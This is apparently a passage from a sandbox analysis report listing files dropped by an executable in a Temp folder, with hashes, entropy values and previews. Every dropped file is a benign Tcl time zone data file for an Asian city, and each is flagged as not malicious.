                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKfbdJm2OHxdPmIWOb/MVSYv/1MesF5X8dSMd0dMVSSm8kvScCvCIMY:MBp52nbdJmdHDPxDTMF/wFZMxcHClMxi
                                                                                                                                                                                                                                                                                                                                MD5:DFABB80419B69BE34B2FCD475CFDFE22
                                                                                                                                                                                                                                                                                                                                SHA1:2CF4F330E00397020328BCE28449B9F63E17067D
                                                                                                                                                                                                                                                                                                                                SHA-256:B251FBDB0DB4ACBB3855063C32681A5F32E609FA3AA0DDC43225D056D07CB2D3
                                                                                                                                                                                                                                                                                                                                SHA-512:EB362B7D0C5A4F1C605A8F2533A5CCAFCFA1F4D3B0F48C417CEA8C492834FE36822A75C726659786CBD4D5A544376D806E6BA8E952607997FBDDAF84E343B353
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Singapore) {. {-9223372036854775808 24925 0 LMT}. {-2177477725 24925 0 SMT}. {-2038200925 25200 0 +07}. {-1167634800 26400 1 +0720}. {-1073028000 26400 0 +0720}. {-894180000 27000 0 +0730}. {-879665400 32400 0 +09}. {-767005200 27000 0 +0730}. {378664200 28800 0 +08}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1993
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7026922613316886
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQHOedtdvBOCdwdVdptQvMCTP2rF1gCzlODU9xE305r/CXVWWHs/gSNknK:5HxvBHwRw/P2rFGAlODU9PZUEWQgmkK
                                                                                                                                                                                                                                                                                                                                MD5:0F445767A84A429787070F7CCFB4D35B
                                                                                                                                                                                                                                                                                                                                SHA1:B524665DAC57E53A6D9A5386B5AEAAE52BD405A5
                                                                                                                                                                                                                                                                                                                                SHA-256:07F4857391E114D4B958C02B8FF72BEBCED72AA730F4F4B09F68F57349473503
                                                                                                                                                                                                                                                                                                                                SHA-512:8FE2AC4C1DCA60E597633377EF1F1C38EE027B7893DB77BA912F294B9B791B6762E62E87DAC17171B15629DD45BD7960D25ADAE96827DAB63FAA80E0956A8C80
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Srednekolymsk) {. {-9223372036854775808 36892 0 LMT}. {-1441188892 36000 0 +10}. {-1247565600 39600 0 +12}. {354891600 43200 1 +12}. {370699200 39600 0 +11}. {386427600 43200 1 +12}. {402235200 39600 0 +11}. {417963600 43200 1 +12}. {433771200 39600 0 +11}. {449586000 43200 1 +12}. {465318000 39600 0 +11}. {481042800 43200 1 +12}. {496767600 39600 0 +11}. {512492400 43200 1 +12}. {528217200 39600 0 +11}. {543942000 43200 1 +12}. {559666800 39600 0 +11}. {575391600 43200 1 +12}. {591116400 39600 0 +11}. {606841200 43200 1 +12}. {622566000 39600 0 +11}. {638290800 43200 1 +12}. {654620400 39600 0 +11}. {670345200 36000 0 +11}. {670348800 39600 1 +11}. {686073600 36000 0 +10}. {695750400 39600 0 +12}. {701794800 43200 1 +12}. {717519600 39600 0 +11}. {733244400 43200 1 +12}. {748969200 39600 0 +11}. {764694000 43200 1 +12}. {78041
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1298
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.983254382416919
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQXbe9Z+zuzq/9mBq/Qq/LPq/wO3q/uq/PC9q/hq/Rq/Gq/fq/Aq/Vtyq/fQH+zp:5XwoKG/M4/z/W/Ta/1/V/Y/o/d/y/D/t
                                                                                                                                                                                                                                                                                                                                MD5:16CF8E32D5B2933CE5A0F2F90B8090BA
                                                                                                                                                                                                                                                                                                                                SHA1:F899656FE3FDDD5F63B18D4800F909CD2DA6A151
                                                                                                                                                                                                                                                                                                                                SHA-256:E098A0A94ED53EC471841CDF6995AEF1F3A2699EDC143FF5DBDA7CB0AFD3FD6C
                                                                                                                                                                                                                                                                                                                                SHA-512:4856AC8AE2BB0C8856A87C5E46AD478E697AACB46B8679870FD581706802772D333FEA5D1D840BDDB1EAB3B4FDD46883CFD2EC4017F9E5C06CAF2A24539FA808
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Taipei) {. {-9223372036854775808 29160 0 LMT}. {-2335248360 28800 0 CST}. {-1017820800 32400 0 JST}. {-766224000 28800 0 CST}. {-745833600 32400 1 CDT}. {-733827600 28800 0 CST}. {-716889600 32400 1 CDT}. {-699613200 28800 0 CST}. {-683884800 32400 1 CDT}. {-670669200 28800 0 CST}. {-652348800 32400 1 CDT}. {-639133200 28800 0 CST}. {-620812800 32400 1 CDT}. {-607597200 28800 0 CST}. {-589276800 32400 1 CDT}. {-576061200 28800 0 CST}. {-562924800 32400 1 CDT}. {-541760400 28800 0 CST}. {-528710400 32400 1 CDT}. {-510224400 28800 0 CST}. {-497174400 32400 1 CDT}. {-478688400 28800 0 CST}. {-465638400 32400 1 CDT}. {-449830800 28800 0 CST}. {-434016000 32400 1 CDT}. {-418208400 28800 0 CST}. {-402480000 32400 1 CDT}. {-386672400 28800 0 CST}. {-370944000 32400 1 CDT}. {-355136400 28800 0 CST}. {-339408000 32400 1 CDT}. {-323600400 2
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):847
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8433853520749905
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQZeQlNRSsOXEFCMiq90DIgb5j6gMJR/4TJTXSATo6SSYL:5HpFqq9iTVrXjSpL
                                                                                                                                                                                                                                                                                                                                MD5:24587E02A79D02973DE32E4CDACBE84C
                                                                                                                                                                                                                                                                                                                                SHA1:41B8CA1CAE10A9340359317EC8DD16C8637C0F1A
                                                                                                                                                                                                                                                                                                                                SHA-256:46C2D8E86BACFDB8280862AD9E28F7A0867740726EF21D08138C9F9A900CC1E9
                                                                                                                                                                                                                                                                                                                                SHA-512:07C939DCD5AB0DA3D3667D0D56421C6B40598C6DAB9641664E0ABB2CE4CC4562B10853C88DB51FBA5D1ED733E86193E88CE8984130FFF83955BD9335A59CF031
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tashkent) {. {-9223372036854775808 16631 0 LMT}. {-1441168631 18000 0 +05}. {-1247547600 21600 0 +06}. {354909600 25200 1 +06}. {370717200 21600 0 +06}. {386445600 25200 1 +06}. {402253200 21600 0 +06}. {417981600 25200 1 +06}. {433789200 21600 0 +06}. {449604000 25200 1 +06}. {465336000 21600 0 +06}. {481060800 25200 1 +06}. {496785600 21600 0 +06}. {512510400 25200 1 +06}. {528235200 21600 0 +06}. {543960000 25200 1 +06}. {559684800 21600 0 +06}. {575409600 25200 1 +06}. {591134400 21600 0 +06}. {606859200 25200 1 +06}. {622584000 21600 0 +06}. {638308800 25200 1 +06}. {654638400 21600 0 +06}. {670363200 18000 0 +05}. {670366800 21600 1 +05}. {686091600 18000 0 +05}. {694206000 18000 0 +05}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1669
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.588597734517364
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQyGeHLQqpkb/cXXn8UDu5u8WmFeb/RLc9qENkw/ybt8i9E60339UyYU7s9UU7UT:5+YTVOZmF7N76eHj2QqzM
                                                                                                                                                                                                                                                                                                                                MD5:EEA5CEEDA499381B331676CF2D3B1189
                                                                                                                                                                                                                                                                                                                                SHA1:BC1D3871CC170F0BCBAE567C0D934CC131A7E410
                                                                                                                                                                                                                                                                                                                                SHA-256:260F3F9A9209170AC02961E881F02AA6D6C720BAACC29756CF1CC730FACCF662
                                                                                                                                                                                                                                                                                                                                SHA-512:0E8FF6B4EF0E102152B20D3C819F2673B6426B3D56DF42F89F44EB4467D0CA45F3D49B6564DA6FCB88BDB1887AF39382766F75FE3A3977CFB4408E06C6D1C062
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tbilisi) {. {-9223372036854775808 10751 0 LMT}. {-2840151551 10751 0 TBMT}. {-1441162751 10800 0 +03}. {-405140400 14400 0 +04}. {354916800 18000 1 +04}. {370724400 14400 0 +04}. {386452800 18000 1 +04}. {402260400 14400 0 +04}. {417988800 18000 1 +04}. {433796400 14400 0 +04}. {449611200 18000 1 +04}. {465343200 14400 0 +04}. {481068000 18000 1 +04}. {496792800 14400 0 +04}. {512517600 18000 1 +04}. {528242400 14400 0 +04}. {543967200 18000 1 +04}. {559692000 14400 0 +04}. {575416800 18000 1 +04}. {591141600 14400 0 +04}. {606866400 18000 1 +04}. {622591200 14400 0 +04}. {638316000 18000 1 +04}. {654645600 14400 0 +04}. {670370400 10800 0 +03}. {670374000 14400 1 +03}. {686098800 10800 0 +03}. {694213200 10800 0 +03}. {701816400 14400 1 +03}. {717537600 10800 0 +03}. {733266000 14400 1 +03}. {748987200 10800 0 +03}. {764715600
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7021
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4346704245463338
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:BboVQCKYJ4cRvxoIDCMcuzf8mmU6gjilpM1Bdy6XaqYx7u0kLBT8U2nTEA4n8t/s:exqcFOIDCMcMrPqpIB8f9ZkF0EIk
                                                                                                                                                                                                                                                                                                                                MD5:E179D37382F44D866D495F5D38FD5D88
                                                                                                                                                                                                                                                                                                                                SHA1:35C5BFFE89795786B7ED0BB3B7822666D6BFCB5B
                                                                                                                                                                                                                                                                                                                                SHA-256:41F1DBB61094C00E2424E22780930258BC99A71D182E7A181065B0A1A57306F1
                                                                                                                                                                                                                                                                                                                                SHA-512:AF1A4AB0BD690F038EBC3AA5CB2CAEE575E639B4504E3BEBC8E1DE85081C780744CBAD5871D62D4F028314D165B4D71E9B3D0B68019FE9D1E49D702101602431
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tehran) {. {-9223372036854775808 12344 0 LMT}. {-1704165944 12344 0 TMT}. {-757394744 12600 0 +0330}. {247177800 14400 0 +04}. {259272000 18000 1 +04}. {277758000 14400 0 +04}. {283982400 12600 0 +0330}. {290809800 16200 1 +0330}. {306531000 12600 0 +0330}. {322432200 16200 1 +0330}. {338499000 12600 0 +0330}. {673216200 16200 1 +0330}. {685481400 12600 0 +0330}. {701209800 16200 1 +0330}. {717103800 12600 0 +0330}. {732745800 16200 1 +0330}. {748639800 12600 0 +0330}. {764281800 16200 1 +0330}. {780175800 12600 0 +0330}. {795817800 16200 1 +0330}. {811711800 12600 0 +0330}. {827353800 16200 1 +0330}. {843247800 12600 0 +0330}. {858976200 16200 1 +0330}. {874870200 12600 0 +0330}. {890512200 16200 1 +0330}. {906406200 12600 0 +0330}. {922048200 16200 1 +0330}. {937942200 12600 0 +0330}. {953584200 16200 1 +0330}. {969478200 12600 0 +
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.82789113675599
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq85zFFwVAIgN0AzFzt2WFK+TT52WFKYzFp:SlSWB9IZaM3yZbwVAIgCAb2wKsswKY7
                                                                                                                                                                                                                                                                                                                                MD5:D044282CC9B9F531D8136612B4AA938D
                                                                                                                                                                                                                                                                                                                                SHA1:5FD01E48BFFC2B54BBA48926EFD2137A91B57E0F
                                                                                                                                                                                                                                                                                                                                SHA-256:FE57D86184A7F4A64F3555DE3F4463531A86BB18F124534F17B09FAB825F83B4
                                                                                                                                                                                                                                                                                                                                SHA-512:DBBA54D68F33E51D51E816D79D83B61490BD31262DFF6037C0834BADA48CBC02F4281203D7212EDF6D96F7FF1EF3843299698BF0DFE10B5F1383AA504594505A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Jerusalem)]} {. LoadTimeZoneFile Asia/Jerusalem.}.set TZData(:Asia/Tel_Aviv) $TZData(:Asia/Jerusalem).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):171
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.858169634371472
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8kNZ4pVAIgNqFNzO62WFK9Z752WFKvNZvn:SlSWB9IZaM3ykZ4pVAIgc3K62wKf12wc
                                                                                                                                                                                                                                                                                                                                MD5:B678D97B4E6E6112299746833C06C70B
                                                                                                                                                                                                                                                                                                                                SHA1:A49BD45DB59BDD3B7BF9159699272389E8EF77AC
                                                                                                                                                                                                                                                                                                                                SHA-256:6AEAE87CAD7FE358A5A1BABE6C0244A3F89403FC64C5AA19E1FFDEDCEB6CF57B
                                                                                                                                                                                                                                                                                                                                SHA-512:BEA10EAE5941E027D8FE9E5D5C03FAE5DCFEF7603088E71CA7CCD0461851E175AE1CC7592DFBEC63F91D840E4E0AA04B54549EB71303666E6EA16AFFF6EDA058
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Thimphu)]} {. LoadTimeZoneFile Asia/Thimphu.}.set TZData(:Asia/Thimbu) $TZData(:Asia/Thimphu).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):173
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.838482422690701
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52WFKvNZLXGm2OHEQUTFnvSVaJKuc/v6QzFtV9gmZVFSTL:SlSWB9X52wKVZCm2OHEfnjKuc/SQnV9y
                                                                                                                                                                                                                                                                                                                                MD5:A52B235D91207E823482EEC1EE8C6433
                                                                                                                                                                                                                                                                                                                                SHA1:84826EAC8043739256E34D828D6BE8E17172A8F8
                                                                                                                                                                                                                                                                                                                                SHA-256:21CE1FAEDD45DED62E78D6DB24F47ED9DEC5642E4A4D7ADDF85B33F8AB82D8CA
                                                                                                                                                                                                                                                                                                                                SHA-512:08E8C68BF6BE5E876A59130C207D4911732EBA0F4E72603213A0AD0CC5DA8EF6AC6389AF8A0781F01B0E72CA030C9A47C46CC0FB422F5C0104A7365D818A4EB9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Thimphu) {. {-9223372036854775808 21516 0 LMT}. {-706341516 19800 0 +0530}. {560025000 21600 0 +06}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):374
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.405484223376936
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKvm2OHOx5PvYvmoZsOXzvmof67zd6avmoFc87e+zvmT0TgvmL:MBp52XmdHOx5PAbZ3zbi7xtbFD7e+zou
                                                                                                                                                                                                                                                                                                                                MD5:4549B66A26A96C10DB196B8957BB6127
                                                                                                                                                                                                                                                                                                                                SHA1:B2B96699AE70CA47F2B180B9AEF8FB9864AE98A1
                                                                                                                                                                                                                                                                                                                                SHA-256:EC533BBE242CE6A521BAED1D37E0DD0247A37FE8D36D25205520B93CF51E4595
                                                                                                                                                                                                                                                                                                                                SHA-512:A6C147DF80BB6D41877AD99673C49FF6AD5C1C03B587D71A70C8F7BD8D321817D9E99BFAE11F7F7C27C1A7563C9A101B6C3E65D962B3524C95113A807720ED4E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tokyo) {. {-9223372036854775808 33539 0 LMT}. {-2587712400 32400 0 JST}. {-683802000 36000 1 JDT}. {-672310800 32400 0 JST}. {-654771600 36000 1 JDT}. {-640861200 32400 0 JST}. {-620298000 36000 1 JDT}. {-609411600 32400 0 JST}. {-588848400 36000 1 JDT}. {-577962000 32400 0 JST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2043
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6031458640952554
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:539i17A9/IJ4vQayW+dRvV8YzXJIq79Af3AuyqM7FfiC/LIcy9zU9Muq2PIX/9se:ijFRRCfQucXsQk7TQy
                                                                                                                                                                                                                                                                                                                                MD5:436E5AA70DD662E337E0144558EA277B
                                                                                                                                                                                                                                                                                                                                SHA1:E268AAD83CE3CC32CB23647E961509EBB4C8AA2C
                                                                                                                                                                                                                                                                                                                                SHA-256:9917B2A1BFAAD1378B90879C92F157BD7912A4072BE21A2A4CB366A38F310D3B
                                                                                                                                                                                                                                                                                                                                SHA-512:C714CFBB58170E2291A78AD4F725613049BC9D52DB9F8685803E8F7E181D7E0C2AAF7E603D29243D2E5F4F1D8A3B0272559E7CBCB51736A8115A44E6D56FA7CC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Tomsk) {. {-9223372036854775808 20391 0 LMT}. {-1578807591 21600 0 +06}. {-1247551200 25200 0 +08}. {354906000 28800 1 +08}. {370713600 25200 0 +07}. {386442000 28800 1 +08}. {402249600 25200 0 +07}. {417978000 28800 1 +08}. {433785600 25200 0 +07}. {449600400 28800 1 +08}. {465332400 25200 0 +07}. {481057200 28800 1 +08}. {496782000 25200 0 +07}. {512506800 28800 1 +08}. {528231600 25200 0 +07}. {543956400 28800 1 +08}. {559681200 25200 0 +07}. {575406000 28800 1 +08}. {591130800 25200 0 +07}. {606855600 28800 1 +08}. {622580400 25200 0 +07}. {638305200 28800 1 +08}. {654634800 25200 0 +07}. {670359600 21600 0 +07}. {670363200 25200 1 +07}. {686088000 21600 0 +06}. {695764800 25200 0 +08}. {701809200 28800 1 +08}. {717534000 25200 0 +07}. {733258800 28800 1 +08}. {748983600 25200 0 +07}. {764708400 28800 1 +08}. {780433200 252
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):181
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8489855608543575
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8pYFwVAIgNzB0L2WFKPQOrFJ4WFKvn:SlSWB9IZaM3yWFwVAIg8L2wKPQOrFJ4H
                                                                                                                                                                                                                                                                                                                                MD5:AF91CF42CFBA12F55AF3E6D26A71946D
                                                                                                                                                                                                                                                                                                                                SHA1:673AC77D4E5B6ED7CE8AE67975372462F6AF870B
                                                                                                                                                                                                                                                                                                                                SHA-256:D9BCAE393D4B9EE5F308FA0C26A7A6BCE716E77DB056E75A3B39B33A227760C8
                                                                                                                                                                                                                                                                                                                                SHA-512:1FD61EA39FF08428486E07AF4404CEA67ACCCB600F11BA74B340A4F663EB8221BC7BF84AE677566F7DDEC0CB42F1946614CD11A9CD7824E0D6CAA804DF0EF514
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Makassar)]} {. LoadTimeZoneFile Asia/Makassar.}.set TZData(:Asia/Ujung_Pandang) $TZData(:Asia/Makassar).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1535
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6833061173791726
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQlTer9uN1xJSIA+SN16zSacGjSvtHpS9xZzS1ZjSnZS3owShjS+5MzSDZmSA/SN:569YXoIA9N0+acGuRIvc1Zun43oDhu+x
                                                                                                                                                                                                                                                                                                                                MD5:9C497C3C57F4FEE50C6BF35D0A3A7E5F
                                                                                                                                                                                                                                                                                                                                SHA1:FAFB3456CADE6AD6FFBADC699AB882FAE2591739
                                                                                                                                                                                                                                                                                                                                SHA-256:19855D4B0EEF8CD85D502262DF7B7F15B069B1A4D169FAB0F20F803C598C1D83
                                                                                                                                                                                                                                                                                                                                SHA-512:255CDF3333789771240A37CECBEB87EEAAE4561616A7066C935B67B8CA930F026F68A82315083190B175C54FBB4B2DB0126F25FDDD6C09DC374E09833225DFB8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ulaanbaatar) {. {-9223372036854775808 25652 0 LMT}. {-2032931252 25200 0 +07}. {252435600 28800 0 +08}. {417974400 32400 1 +08}. {433782000 28800 0 +08}. {449596800 32400 1 +08}. {465318000 28800 0 +08}. {481046400 32400 1 +08}. {496767600 28800 0 +08}. {512496000 32400 1 +08}. {528217200 28800 0 +08}. {543945600 32400 1 +08}. {559666800 28800 0 +08}. {575395200 32400 1 +08}. {591116400 28800 0 +08}. {606844800 32400 1 +08}. {622566000 28800 0 +08}. {638294400 32400 1 +08}. {654620400 28800 0 +08}. {670348800 32400 1 +08}. {686070000 28800 0 +08}. {701798400 32400 1 +08}. {717519600 28800 0 +08}. {733248000 32400 1 +08}. {748969200 28800 0 +08}. {764697600 32400 1 +08}. {780418800 28800 0 +08}. {796147200 32400 1 +08}. {811868400 28800 0 +08}. {828201600 32400 1 +08}. {843922800 28800 0 +08}. {859651200 32400 1 +08}. {875372400
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):187
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.675919405724711
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8TcXHVAIgNrfcXKxL2WFKhrMEBQWFKucXu:SlSWB9IZaM3yIVAIg7xL2wKhrMEewKI
                                                                                                                                                                                                                                                                                                                                MD5:73C6A7BC088A3CD92CAC2F8B019994A0
                                                                                                                                                                                                                                                                                                                                SHA1:74D5DCE1100F6C97DFCFAD5EFC310196F03ABED5
                                                                                                                                                                                                                                                                                                                                SHA-256:8F075ACF5FF86E5CDE63E178F7FCB692C209B6023C80157A2ABF6826AE63C6C3
                                                                                                                                                                                                                                                                                                                                SHA-512:4EAD916D2251CF3A9B336448B467282C251EE5D98299334F365711CCA8CAF9CA83600503A3346AEC9DFA9E9AF064BA6DEF570BABCC48AE5EB954DBF574A769B2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ulaanbaatar)]} {. LoadTimeZoneFile Asia/Ulaanbaatar.}.set TZData(:Asia/Ulan_Bator) $TZData(:Asia/Ulaanbaatar).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):143
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.962709386113539
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52WFKjmcXGm2OHEVPvUWA0GVFSTL:SlSWB9X52wKjmTm2OHEVPXA0CUn
                                                                                                                                                                                                                                                                                                                                MD5:6E79B04FC6FE96C90277593719BECD36
                                                                                                                                                                                                                                                                                                                                SHA1:81798A9F349A7DEAF9218A21B8C2D8A3E641E9B7
                                                                                                                                                                                                                                                                                                                                SHA-256:A73686D7BF4EE44DC7BBD1CAAF2D212D7D12478F1521BF5A628EDBEA79B99725
                                                                                                                                                                                                                                                                                                                                SHA-512:F6781EDA72F4B62FE128332AC2B6BDDFFF6E94DF79914C467C2A30BBE05ABE005B23C0F8A5682095FA874CB3787BD499DBBA8F1644515B6914180A68C9AB6066
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Urumqi) {. {-9223372036854775808 21020 0 LMT}. {-1325483420 21600 0 +06}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1987
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.684365782602096
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQueIlfR30vBOCdwdVdptQvMCTP2rF1gCzlODU9xE305r/CXVWWHs/gSNknhT:5YJkvBHwRw/P2rFGAlODU9PZUEWQgmkl
                                                                                                                                                                                                                                                                                                                                MD5:F648B8CDF0F44BF2733AD480D91602C2
                                                                                                                                                                                                                                                                                                                                SHA1:FCDB62F1D2781836AAAFF1C1B651E91A8E79A901
                                                                                                                                                                                                                                                                                                                                SHA-256:C94B072DDB28C27AAA936D27D5A2F1400E47E8BBFCB3EF370BF2C7252E69FB98
                                                                                                                                                                                                                                                                                                                                SHA-512:39E793B707C2EEF99BAE8E926A1C8CAF4A1989F71842C348A5819CC4BE3D6DC81D2781BF20CB95631EC532A345B7CD41BA88505B301CA7928E676F55252C6DDD
                                                                                                                                                                                                                                                                                                                                Malicious:false
